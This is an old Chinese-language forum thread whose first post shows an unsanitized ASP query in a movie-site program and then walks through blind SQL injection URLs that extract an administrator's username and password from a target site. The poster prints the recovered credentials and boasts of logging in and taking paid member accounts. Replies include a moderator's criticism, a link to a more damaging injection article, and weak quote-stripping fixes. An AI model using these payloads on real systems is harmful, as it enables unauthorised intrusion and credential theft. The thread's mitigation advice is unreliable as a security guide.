12 3 4 / 4 页下一页

论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2003-08-24 12:42 |只看该作者 |倒序浏览

近日学习sql injection,下载金梅收费电影程序2003会员版看了一通,
现movie.asp这个文件有问题,
  dim sql
  dim rs
  articleid=request("id"

set rs=server.createobject("adodb.recordset"

  sql="update learning set hits=hits+1 where articleID="&articleid
  rs.open sql,conn,1,3
  sql="select * from learning where articleid="&articleid
  rs.open sql,conn,1,1
  title=rs("title"

ittype=rs("typeid"

没有对变量做任何检查,那就别怪我了,呵呵,找了个目标网站,
我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>;4)
正常返回页面,由此我们可以知道管理员的帐号是大于4位的!
我们继续,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)>;
"无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的
我们再来,
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(name)=

正常返回页面,好极了,由此得出
name为8位
同样
http://www.target.com/movie.asp?id=330 and 1=(select id from password where len(pwd)=21)
正常返回页面
pwd为21位,TNND的,这么长!

不管了,我们接下来开始测试管理员的用户名
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>;50)
正常返回页面,看来还不够大.
注:mid函数可以把密码分成若干部分取出，使用方法 mid(字符串，起始位，取出的字符串的长度)
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))>;100)
"无法显示页面",看来比100还小.
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(name,1,1))=100)
正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100
通过查询asc码表可以得到,
name的第一位为:d

接下来顺利的得到了name=darkeyes^
然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!

http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>;100)
正常显示页面,再来
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))>;110)
"无法显示页面",比110小哦,呵呵
http://www.target.com/movie.asp?id=320 and 1=(select id from password where asc(mid(pwd,1,1))=102)
正常显示页面,对了,得到
pwd的第一位为:f

最后顺利的得到了
pwd=xyfsdb7ew8y654231123d
找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵

注:文章拿去投稿了,到现在还没结果,如果你看了觉得好,也最好不要拿去转载,谢谢!

黑色海岸线，美丽风景线

文库|博客

yangbo9229

白手起家

论坛徽章:: 0

2楼 [报告]

发表于 2003-08-25 00:13 |只看该作者

简单入侵收费电影网站!　　ZT

我相问,你是怎么样知道的movie.asp这个文件有问题,也就是说你写这篇文章的思路是什么,不知道能否告诉小弟

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

koath

白手起家

论坛徽章:: 1

3楼 [报告]

发表于 2003-08-25 04:04 |只看该作者

简单入侵收费电影网站!　　ZT

一直没有试过从页面入侵.....看了眼馋

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

koath

白手起家

论坛徽章:: 1

4楼 [报告]

发表于 2003-08-25 04:07 |只看该作者

简单入侵收费电影网站!　　ZT

英雄出少年,
没错的 ,意思是少年可见其比为英雄

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

alex2003

丰衣足食

论坛徽章:: 0

5楼 [报告]

发表于 2003-08-25 09:33 |只看该作者

简单入侵收费电影网站!　　ZT

对啊，你怎么拿到movie.asp的源代码的，是不是自己和自己玩啊。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

wgj

丰衣足食

论坛徽章:: 0

6楼 [报告]

发表于 2003-08-25 10:54 |只看该作者

简单入侵收费电影网站!　　ZT

就是！

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

司

家境小康

论坛徽章:: 0

7楼 [报告]

发表于 2003-08-25 13:00 |只看该作者

简单入侵收费电影网站!　　ZT

"金梅收费电影程序2003会员版" 肯定是个公开源码的网页程序了.
搜索一下应该能找到吧.
作者也说"找了个目标网站", 当然就是使用这个程序做的网站喽^_^~~~

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

e4gle

荣誉版主

论坛徽章:: 1

8楼 [报告]

发表于 2003-08-25 15:34 |只看该作者

简单入侵收费电影网站!　　ZT

嗯，司mm说的不错，最近成长挺快啊

不过这样的文章我不太赞同，没什么技术含量，还有夸耀的成分在里面

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

lqy009

稍有积蓄

论坛徽章:: 0

9楼 [报告]

发表于 2003-08-26 10:17 |只看该作者

简单入侵收费电影网站!　　ZT

有容乃大！

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

lily1978

白手起家

论坛徽章:: 0

10楼 [报告]

发表于 2003-08-30 15:34 |只看该作者

简单入侵收费电影网站!　　ZT

你们看看有技术含量的sql injection攻击

http://angel.50m.org/article/17.htm

这样才具有真正的杀伤力的！！

解决方法就太多了，这里我们只是提醒提醒在做开发的时候写程序的时候还是要谨慎的！

最简单的就是
on error resume next
replace(str,"'","''"

'单引号替换为双引号
replace(str,"'",""

'单引号替换为空

..................................
if err.number>;0 then
response.write("<script>;alert("数据错误"

;history.go(-1);</script>;"

end if